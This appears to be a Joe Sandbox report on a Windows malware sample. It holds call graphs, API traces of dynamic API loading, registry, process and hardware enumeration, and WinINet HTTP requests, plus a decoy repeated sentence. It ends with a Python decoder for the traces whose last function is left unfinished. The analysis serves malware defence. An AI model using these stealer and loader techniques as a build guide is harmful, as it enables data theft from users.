15204 39a9b0 4 API calls 15203->15204 15205 3924ae 15204->15205 15206 39a8a0 lstrcpy 15205->15206 15207 3924b7 15206->15207 15749 398320 15207->15749 15209 3924d3 15210 39a920 3 API calls 15209->15210 15211 3924e6 15210->15211 15212 39a8a0 lstrcpy 15211->15212 15213 3924ef 15212->15213 15214 39a9b0 4 API calls 15213->15214 15215 392519 15214->15215 15216 39a8a0 lstrcpy 15215->15216 15217 392522 15216->15217 15218 39a9b0 4 API calls 15217->15218 15219 392543 15218->15219 
15220 39a8a0 lstrcpy 15219->15220 15221 39254c 15220->15221 15222 398320 17 API calls 15221->15222 15223 392568 15222->15223 15224 39a920 3 API calls 15223->15224 15225 39257b 15224->15225 15226 39a8a0 lstrcpy 15225->15226 15227 392584 15226->15227 15228 39a9b0 4 API calls 15227->15228 15229 3925ae 15228->15229 15230 39a8a0 lstrcpy 15229->15230 15231 3925b7 15230->15231 15232 39a9b0 4 API calls 15231->15232 15233 3925d6 15232->15233 15234 39a8a0 lstrcpy 15233->15234 15235 3925df 15234->15235 15236 39a9b0 4 API calls 15235->15236 15237 392600 15236->15237 15238 39a8a0 lstrcpy 15237->15238 15239 392609 15238->15239 15785 398680 15239->15785 15241 392620 15242 39a920 3 API calls 15241->15242 15243 392633 15242->15243 15244 39a8a0 lstrcpy 15243->15244 15245 39263c 15244->15245 15246 39265a lstrlen 15245->15246 15247 39266a 15246->15247 15248 39a740 lstrcpy 15247->15248 15249 39267c 15248->15249 15250 381590 lstrcpy 15249->15250 15251 39268d 15250->15251 15795 395190 15251->15795 15253 392699 15253->13684 15983 39aad0 15254->15983 15256 385009 InternetOpenUrlA 15260 385021 15256->15260 15257 38502a InternetReadFile 15257->15260 15258 3850a0 InternetCloseHandle InternetCloseHandle 15259 3850ec 15258->15259 15259->13688 15260->15257 15260->15258 15984 3898d0 15261->15984 15263 390759 15264 390a38 15263->15264 15265 39077d 15263->15265 15266 381590 lstrcpy 15264->15266 15268 390799 StrCmpCA 15265->15268 15267 390a49 15266->15267 16160 390250 15267->16160 15270 390843 15268->15270 15271 3907a8 15268->15271 15275 390865 StrCmpCA 15270->15275 15272 39a7a0 lstrcpy 15271->15272 15274 3907c3 15272->15274 15276 381590 lstrcpy 15274->15276 15277 390874 15275->15277 15279 39096b 15275->15279 15278 39080c 15276->15278 15280 39a740 lstrcpy 15277->15280 15281 39a7a0 lstrcpy 15278->15281 15282 39099c StrCmpCA 15279->15282 15283 390881 15280->15283 15285 390823 15281->15285 15286 3909ab 15282->15286 15287 390a2d 15282->15287 15284 39a9b0 4 API calls 15283->15284 15288 3908ac 
15284->15288 15289 39a7a0 lstrcpy 15285->15289 15290 381590 lstrcpy 15286->15290 15287->13692 15292 39a920 3 API calls 15288->15292 15293 39083e 15289->15293 15291 3909f4 15290->15291 15294 39a7a0 lstrcpy 15291->15294 15295 3908b3 15292->15295 15987 38fb00 15293->15987 15297 390a0d 15294->15297 15298 39a9b0 4 API calls 15295->15298 15299 39a7a0 lstrcpy 15297->15299 15300 3908ba 15298->15300 15301 390a28 15299->15301 15302 39a8a0 lstrcpy 15300->15302 16103 390030 15301->16103 15635 39a7a0 lstrcpy 15634->15635 15636 381683 15635->15636 15637 39a7a0 lstrcpy 15636->15637 15638 381695 15637->15638 15639 39a7a0 lstrcpy 15638->15639 15640 3816a7 15639->15640 15641 39a7a0 lstrcpy 15640->15641 15642 3815a3 15641->15642 15642->14515 15644 3847c6 15643->15644 15645 384838 lstrlen 15644->15645 15669 39aad0 15645->15669 15647 384848 InternetCrackUrlA 15648 384867 15647->15648 15648->14592 15650 389af9 LocalAlloc 15649->15650 15651 384eee 15649->15651 15650->15651 15652 389b14 CryptStringToBinaryA 15650->15652 15651->14614 15651->14616 15652->15651 15653 389b39 LocalFree 15652->15653 15653->15651 15655 39a740 lstrcpy 15654->15655 15656 398b74 15655->15656 15657 39a740 lstrcpy 15656->15657 15658 398b82 GetSystemTime 15657->15658 15660 398b99 15658->15660 15659 39a7a0 lstrcpy 15661 398bfc 15659->15661 15660->15659 15661->14608 15663 39a931 15662->15663 15664 39a988 15663->15664 15666 39a968 lstrcpy lstrcat 15663->15666 15665 39a7a0 lstrcpy 15664->15665 15667 39a994 15665->15667 15666->15664 15667->14611 15668->14726 15669->15647 15670->14736 15671->14877 15672->14879 15673->14887 15802 3977a0 15674->15802 15677 3976c6 RegOpenKeyExA 15679 397704 RegCloseKey 15677->15679 15680 3976e7 RegQueryValueExA 15677->15680 15678 391c1e 15678->14969 15679->15678 15680->15679 15682 391c99 15681->15682 15682->14983 15684 391e09 15683->15684 15684->15025 15686 397a9a wsprintfA 15685->15686 15687 391e84 15685->15687 15686->15687 15687->15039 15689 397b4d 15688->15689 15691 391efe 15688->15691 
15809 398d20 LocalAlloc CharToOemW 15689->15809 15691->15053 15693 39a740 lstrcpy 15692->15693 15694 397bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15693->15694 15701 397c25 15694->15701 15695 397d18 15697 397d28 15695->15697 15698 397d1e LocalFree 15695->15698 15696 397c46 GetLocaleInfoA 15696->15701 15699 39a7a0 lstrcpy 15697->15699 15698->15697 15703 397d37 15699->15703 15700 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15700->15701 15701->15695 15701->15696 15701->15700 15702 39a8a0 lstrcpy 15701->15702 15702->15701 15703->15066 15705 392008 15704->15705 15705->15081 15707 399493 GetModuleFileNameExA CloseHandle 15706->15707 15708 3994b5 15706->15708 15707->15708 15709 39a740 lstrcpy 15708->15709 15710 392091 15709->15710 15710->15096 15712 397e68 RegQueryValueExA 15711->15712 15713 392119 15711->15713 15714 397e8e RegCloseKey 15712->15714 15713->15110 15714->15713 15716 397fb9 GetLogicalProcessorInformationEx 15715->15716 15717 397fd8 GetLastError 15716->15717 15719 398029 15716->15719 15724 397fe3 15717->15724 15727 398022 15717->15727 15721 3989f0 2 API calls 15719->15721 15723 39807b 15721->15723 15722 3989f0 2 API calls 15725 392194 15722->15725 15726 398084 wsprintfA 15723->15726 15723->15727 15724->15716 15724->15725 15810 3989f0 15724->15810 15813 398a10 GetProcessHeap RtlAllocateHeap 15724->15813 15725->15124 15726->15725 15727->15722 15727->15725 15729 39220f 15728->15729 15729->15138 15731 3989b0 15730->15731 15732 39814d GlobalMemoryStatusEx 15731->15732 15734 398163 __aulldiv 15732->15734 15733 39819b wsprintfA 15735 392289 15733->15735 15734->15733 15735->15152 15737 3987fb GetProcessHeap RtlAllocateHeap wsprintfA 15736->15737 15739 39a740 lstrcpy 15737->15739 15740 39230b 15739->15740 15740->15166 15742 39a740 lstrcpy 15741->15742 15744 398229 15742->15744 15743 398263 15745 39a7a0 lstrcpy 15743->15745 15744->15743 15747 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15744->15747 15748 39a8a0 lstrcpy 15744->15748 15746 3982dc 15745->15746 
15746->15183 15747->15744 15748->15744 15750 39a740 lstrcpy 15749->15750 15751 39835c RegOpenKeyExA 15750->15751 15752 3983ae 15751->15752 15753 3983d0 15751->15753 15754 39a7a0 lstrcpy 15752->15754 15755 3983f8 RegEnumKeyExA 15753->15755 15756 398613 RegCloseKey 15753->15756 15765 3983bd 15754->15765 15757 39843f wsprintfA RegOpenKeyExA 15755->15757 15758 39860e 15755->15758 15759 39a7a0 lstrcpy 15756->15759 15760 3984c1 RegQueryValueExA 15757->15760 15761 398485 RegCloseKey RegCloseKey 15757->15761 15758->15756 15759->15765 15763 3984fa lstrlen 15760->15763 15764 398601 RegCloseKey 15760->15764 15762 39a7a0 lstrcpy 15761->15762 15762->15765 15763->15764 15766 398510 15763->15766 15764->15758 15765->15209 15767 39a9b0 4 API calls 15766->15767 15768 398527 15767->15768 15769 39a8a0 lstrcpy 15768->15769 15770 398533 15769->15770 15771 39a9b0 4 API calls 15770->15771 15772 398557 15771->15772 15773 39a8a0 lstrcpy 15772->15773 15774 398563 15773->15774 15775 39856e RegQueryValueExA 15774->15775 15775->15764 15776 3985a3 15775->15776 15777 39a9b0 4 API calls 15776->15777 15778 3985ba 15777->15778 15779 39a8a0 lstrcpy 15778->15779 15780 3985c6 15779->15780 15781 39a9b0 4 API calls 15780->15781 15782 3985ea 15781->15782 15783 39a8a0 lstrcpy 15782->15783 15784 3985f6 15783->15784 15784->15764 15786 39a740 lstrcpy 15785->15786 15787 3986bc CreateToolhelp32Snapshot Process32First 15786->15787 15788 3986e8 Process32Next 15787->15788 15789 39875d CloseHandle 15787->15789 15788->15789 15791 3986fd 15788->15791 15790 39a7a0 lstrcpy 15789->15790 15792 398776 15790->15792 15791->15788 15793 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15791->15793 15794 39a8a0 lstrcpy 15791->15794 15792->15241 15793->15791 15794->15791 15796 39a7a0 lstrcpy 15795->15796 15797 3951b5 15796->15797 15798 381590 lstrcpy 15797->15798 15799 3951c6 15798->15799 15814 385100 15799->15814 15801 3951cf 15801->15253 15805 397720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15802->15805 15804 3976b9 15804->15677 
15804->15678 15806 397780 RegCloseKey 15805->15806 15807 397765 RegQueryValueExA 15805->15807 15808 397793 15806->15808 15807->15806 15808->15804 15809->15691 15811 3989f9 GetProcessHeap HeapFree 15810->15811 15812 398a0c 15810->15812 15811->15812 15812->15724 15813->15724 15815 39a7a0 lstrcpy 15814->15815 15816 385119 15815->15816 15817 3847b0 2 API calls 15816->15817 15818 385125 15817->15818 15974 398ea0 15818->15974 15820 385184 15821 385192 lstrlen 15820->15821 15822 3851a5 15821->15822 15823 398ea0 4 API calls 15822->15823 15824 3851b6 15823->15824 15825 39a740 lstrcpy 15824->15825 15826 3851c9 15825->15826 15827 39a740 lstrcpy 15826->15827 15828 3851d6 15827->15828 15829 39a740 lstrcpy 15828->15829 15830 3851e3 15829->15830 15831 39a740 lstrcpy 15830->15831 15832 3851f0 15831->15832 15833 39a740 lstrcpy 15832->15833 15834 3851fd InternetOpenA StrCmpCA 15833->15834 15835 38522f 15834->15835 15836 3858c4 InternetCloseHandle 15835->15836 15837 398b60 3 API calls 15835->15837 15843 3858d9 codecvt 15836->15843 15838 38524e 15837->15838 15839 39a920 3 API calls 15838->15839 15840 385261 15839->15840 15841 39a8a0 lstrcpy 15840->15841 15842 38526a 15841->15842 15844 39a9b0 4 API calls 15842->15844 15846 39a7a0 lstrcpy 15843->15846 15845 3852ab 15844->15845 15847 39a920 3 API calls 15845->15847 15855 385913 15846->15855 15848 3852b2 15847->15848 15849 39a9b0 4 API calls 15848->15849 15850 3852b9 15849->15850 15851 39a8a0 lstrcpy 15850->15851 15852 3852c2 15851->15852 15853 39a9b0 4 API calls 15852->15853 15854 385303 15853->15854 15856 39a920 3 API calls 15854->15856 15855->15801 15857 38530a 15856->15857 15858 39a8a0 lstrcpy 15857->15858 15859 385313 15858->15859 15860 385329 InternetConnectA 15859->15860 15860->15836 15861 385359 HttpOpenRequestA 15860->15861 15863 3858b7 InternetCloseHandle 15861->15863 15864 3853b7 15861->15864 15863->15836 15865 39a9b0 4 API calls 15864->15865 15866 3853cb 15865->15866 15867 39a8a0 lstrcpy 15866->15867 15868 3853d4 15867->15868 
15869 39a920 3 API calls 15868->15869 15870 3853f2 15869->15870 15871 39a8a0 lstrcpy 15870->15871 15872 3853fb 15871->15872 15873 39a9b0 4 API calls 15872->15873 15874 38541a 15873->15874 15875 39a8a0 lstrcpy 15874->15875 15876 385423 15875->15876 15877 39a9b0 4 API calls 15876->15877 15878 385444 15877->15878 15879 39a8a0 lstrcpy 15878->15879 15880 38544d 15879->15880 15881 39a9b0 4 API calls 15880->15881 15882 38546e 15881->15882 15883 39a8a0 lstrcpy 15882->15883 15975 398ead CryptBinaryToStringA 15974->15975 15979 398ea9 15974->15979 15976 398ece GetProcessHeap RtlAllocateHeap 15975->15976 15975->15979 15977 398ef4 codecvt 15976->15977 15976->15979 15978 398f05 CryptBinaryToStringA 15977->15978 15978->15979 15979->15820 15983->15256 16226 389880 15984->16226 15986 3898e1 15986->15263 15988 39a740 lstrcpy 15987->15988 15989 38fb16 15988->15989 16161 39a740 lstrcpy 16160->16161 16162 390266 16161->16162 16163 398de0 2 API calls 16162->16163 16164 39027b 16163->16164 16165 39a920 3 API calls 16164->16165 16166 39028b 16165->16166 16167 39a8a0 lstrcpy 16166->16167 16168 390294 16167->16168 16169 39a9b0 4 API calls 16168->16169 16170 3902b8 16169->16170 16227 38988e 16226->16227 16230 386fb0 16227->16230 16229 3898ad codecvt 16229->15986 16233 386d40 16230->16233 16234 386d63 16233->16234 16246 386d59 16233->16246 16234->16246 16247 386660 16234->16247 16236 386dbe 16236->16246 16253 3869b0 16236->16253 16238 386e2a 16239 386ee6 VirtualFree 16238->16239 16241 386ef7 16238->16241 16238->16246 16239->16241 16240 386f41 16242 3989f0 2 API calls 16240->16242 16240->16246 16241->16240 16243 386f38 16241->16243 16244 386f26 FreeLibrary 16241->16244 16242->16246 16245 3989f0 2 API calls 16243->16245 16244->16241 16245->16240 16246->16229 16252 38668f VirtualAlloc 16247->16252 16249 386730 16250 38673c 16249->16250 16251 386743 VirtualAlloc 16249->16251 16250->16236 16251->16250 16252->16249 16252->16250 16254 3869c9 16253->16254 16255 3869d5 16253->16255 16254->16255 16256 
386a09 LoadLibraryA 16254->16256 16255->16238 16256->16255 16257 386a32 16256->16257 16260 386ae0 16257->16260 16263 398a10 GetProcessHeap RtlAllocateHeap 16257->16263 16259 386ba8 GetProcAddress 16259->16255 16259->16260 16260->16255 16260->16259 16261 3989f0 2 API calls 16261->16260 16262 386a8b 16262->16255 16262->16261 16263->16262

                            Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,011521E8), ref: 003998A1
                            • GetProcAddress.KERNEL32(74DD0000,01152458), ref: 003998BA
                            • GetProcAddress.KERNEL32(74DD0000,01152188), ref: 003998D2
                            • GetProcAddress.KERNEL32(74DD0000,01152200), ref: 003998EA
                            • GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 00399903
                            • GetProcAddress.KERNEL32(74DD0000,011590B0), ref: 0039991B
                            • GetProcAddress.KERNEL32(74DD0000,011453F0), ref: 00399933
                            • GetProcAddress.KERNEL32(74DD0000,01145330), ref: 0039994C
                            • GetProcAddress.KERNEL32(74DD0000,01152218), ref: 00399964
                            • GetProcAddress.KERNEL32(74DD0000,01152278), ref: 0039997C
                            • GetProcAddress.KERNEL32(74DD0000,01152230), ref: 00399995
                            • GetProcAddress.KERNEL32(74DD0000,01152248), ref: 003999AD
                            • GetProcAddress.KERNEL32(74DD0000,01145550), ref: 003999C5
                            • GetProcAddress.KERNEL32(74DD0000,01152260), ref: 003999DE
                            • GetProcAddress.KERNEL32(74DD0000,011522F0), ref: 003999F6
                            • GetProcAddress.KERNEL32(74DD0000,01145350), ref: 00399A0E
                            • GetProcAddress.KERNEL32(74DD0000,01152308), ref: 00399A27
                            • GetProcAddress.KERNEL32(74DD0000,01152320), ref: 00399A3F
                            • GetProcAddress.KERNEL32(74DD0000,01145370), ref: 00399A57
                            • GetProcAddress.KERNEL32(74DD0000,01152338), ref: 00399A70
                            • GetProcAddress.KERNEL32(74DD0000,01145430), ref: 00399A88
                            • LoadLibraryA.KERNEL32(01152470,?,00396A00), ref: 00399A9A
                            • LoadLibraryA.KERNEL32(011524E8,?,00396A00), ref: 00399AAB
                            • LoadLibraryA.KERNEL32(011524A0,?,00396A00), ref: 00399ABD
                            • LoadLibraryA.KERNEL32(01152488,?,00396A00), ref: 00399ACF
                            • LoadLibraryA.KERNEL32(01152500,?,00396A00), ref: 00399AE0
                            • GetProcAddress.KERNEL32(75A70000,01152518), ref: 00399B02
                            • GetProcAddress.KERNEL32(75290000,011524D0), ref: 00399B23
                            • GetProcAddress.KERNEL32(75290000,011524B8), ref: 00399B3B
                            • GetProcAddress.KERNEL32(75BD0000,01152530), ref: 00399B5D
                            • GetProcAddress.KERNEL32(75450000,01145250), ref: 00399B7E
                            • GetProcAddress.KERNEL32(76E90000,011591B0), ref: 00399B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00399BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00399BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                            • Instruction ID: 0afa8450dcb3e2371a29d91b22d20635bc77a6efdd8a56d5291d6a3c66bfd0f3
                            • Opcode Fuzzy Hash: 0dbb15979f8127da16a89459921e5098375d8972816802c1c66fe9b0725fc3e3
                            • Instruction Fuzzy Hash: 30A1BFB5500A489FD308EFA8FD88E563FF9F76C309704851AE605C3225D779984AFB16

                            Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0038460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0038479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846B7, 0038471E, 0038477B, 00384657, 0038475A, 00384638, 0038466D, 00384683, 00384643, 003846D8, 00384765, 003846AC, 00384678, 00384713, 003846CD, 00384617, 00384622, 00384734, 003845E8, 003845DD, 00384729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003846C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00384662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003845F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0038473F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated and `$`-joined in the original ID; shown once here)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 77cffd5c73ef494fb682f23c877f88e34be8bdf390181f3b2eb24a8e0440e12c
                            • Instruction ID: 2e063f7c37fa68541b47a022c2f46aba042bd111f5326623eb455024a3b2b625
                            • Opcode Fuzzy Hash: 77cffd5c73ef494fb682f23c877f88e34be8bdf390181f3b2eb24a8e0440e12c
                            • Instruction Fuzzy Hash: 584106606E77047EE626BFA49842EDD777ADF4770CF587044E8205638FCBB065894622

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003863FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0038646D
                            • InternetCloseHandle.WININET(00000000), ref: 003864EF
                            • InternetCloseHandle.WININET(00000000), ref: 003864F9
                            • InternetCloseHandle.WININET(00000000), ref: 00386503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: the same 14 memory dumps as listed for the previous function
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                            • Instruction ID: 09556aedb75f6a886fd4a2da66488018361f6e102fd6a5948261133a35a7eca2
                            • Opcode Fuzzy Hash: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                            • Instruction Fuzzy Hash: 5D714E71A00318ABDF15EBA0CC4AFEE77B8FB44704F104198F10A6B190DBB46A89DF91
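
The eleven WinINet calls above are the whole download helper of this routine: open a session, connect, build a GET, override the security flags, send, read the status code, then pull the body in 0x7CF-byte reads and close the three handles. The report prints the arguments as raw hex, so decoding them is the first thing an analyst does. The Python below is an added example (it is not part of the Joe Sandbox report and not code from the sample); it parses the trace lines exactly as printed above and names the constants with the values from Microsoft's public wininet.h header. The 4-byte value passed to InternetSetOptionA is not captured in the trace (shown as ?), so the script reports only that the security flags were set before the request went out, not which check was changed.

```python
"""Decode the WinINet download helper from Joe Sandbox API trace lines.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Constant names and values are taken from the public wininet.h header.
"""
import re
from typing import Dict, List, Optional

# Constructed input: the routine's API lines as the report prints them.
TRACE = """
InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003863FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0038646D
InternetCloseHandle.WININET(00000000), ref: 003864EF
InternetCloseHandle.WININET(00000000), ref: 003864F9
InternetCloseHandle.WININET(00000000), ref: 00386503
"""

LINE_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})$")

# wininet.h values for the arguments this routine passes.
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {  # HttpOpenRequestA dwFlags bits
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY = {0x13: "HTTP_QUERY_STATUS_CODE"}


def parse(trace: str) -> List[dict]:
    """One record per trace line: api, module, argument strings, call site."""
    calls = []
    for line in trace.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module, "args": args.split(","), "ref": ref})
    return calls


def as_int(arg: str) -> Optional[int]:
    # Arguments are 8 hex digits; '?' (not captured) and literals such as GET give None.
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every set bit; keep unnamed bits as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)  # keys are distinct single bits, so sum == OR
    return names + ([f"0x{unknown:08X}"] if unknown else [])


def decode_call(call: dict) -> dict:
    """Attach the decoded meaning of the argument that matters for each API."""
    api, a = call["api"], call["args"]
    out = {"api": api, "ref": call["ref"]}
    if api == "InternetOpenA":                 # a[1] = dwAccessType
        out["access_type"] = OPEN_TYPE.get(as_int(a[1]), a[1])
    elif api == "InternetConnectA":            # a[5] = dwService
        out["service"] = SERVICE.get(as_int(a[5]), a[5])
    elif api == "HttpOpenRequestA":            # a[1] = verb, a[6] = dwFlags
        out["verb"] = a[1]
        flags = as_int(a[6])
        out["flags"] = decode_flags(flags, REQUEST_FLAGS) if flags is not None else ["?"]
    elif api == "InternetSetOptionA":          # a[1] = dwOption, a[2] = lpBuffer
        out["option"] = OPTIONS.get(as_int(a[1]), a[1])
        out["value_captured"] = as_int(a[2]) is not None
    elif api == "HttpQueryInfoA":              # a[1] = dwInfoLevel
        out["info_level"] = QUERY.get(as_int(a[1]), a[1])
    elif api == "InternetReadFile":            # a[2] = dwNumberOfBytesToRead
        out["chunk_bytes"] = as_int(a[2])
    return out


def summarize(trace: str) -> dict:
    """The facts an analyst wants from this routine, as one record."""
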